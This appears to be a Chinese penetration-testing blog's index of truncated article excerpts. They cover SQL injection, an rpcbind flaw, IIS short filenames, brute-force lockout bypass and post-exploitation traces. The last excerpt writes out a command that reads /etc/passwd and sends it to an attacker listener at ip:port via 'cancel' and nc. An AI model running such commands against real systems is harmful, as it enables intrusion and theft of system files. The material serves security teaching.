软件及工具介绍: Windows App: WSL2 Kali Linux 2024.1 Windows Terminal TranslucentTB 渗透测试: 常用的Python、C#、Java等 工具均配有 start.bat 或 start.vbs 快捷启动方式 [+] 人工智...

常见的目录结构，简单了解一下其作用 admin 后台管理目录 css CSS样式表目录 data 系统处理数据相关目录 install 网页安装目录 images 系统图片存放目录 template 模板 system 管理目录 代码审...

代码审计 教学计划：审计项目漏洞 Demo-> 审计思路 -> 完整源码框架 -> 验证并利用漏洞 教学内容：PHP，JAVA 网站应用，引入框架类开发源码，相关审计工具及插件使用 必备知识点：环境安装搭建...

学以致用。 漏洞发现 常规流程走一遍，发现一处标记信息已读的功能点比较可疑： 抓包加单引号重放： 可以看到单引号被转义了，看下闭合方式，问题不大，因为有回显，直接使用报错注入。 报错注...

111端口rpcbind漏洞 最近扫描一个内网的ip，发现有一个不常见的端口开着，服务是rpcbind，上网一查还真是有漏洞。 该漏洞可使攻击者在远程rpcbind绑定主机上分配任意大小的内存(每次攻击最高可...

Cloudflare Radar Scan简介 为了更好地了解世界各地的互联网使用情况，可以借助Cloudflare 的 URL 扫描器调查域、IP、URL 或 ASN 的详细信息。 截图 网站使用了哪些技术（php、mysql、nginx、wo...

后渗透系列 Win­dows10/11 中文用户输入痕迹信息

最近吐司论坛里面大佬发出了一个新姿势，于是我就照葫芦画瓢，来复现一番。 吐司大佬的原文章：https://www.t00ls.net/thread-48499-1-1.html 我们先来温习下短文件名漏洞，一般是iis配上.net的...

buro暴力破解保护失效绕过IP 封锁之登录次数限制

靶机无回显的情况下，可使用 cancel  来把回显发送到攻击机端 cancel -u '$(cat /etc/passwd)' -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示： 攻击机ip：192...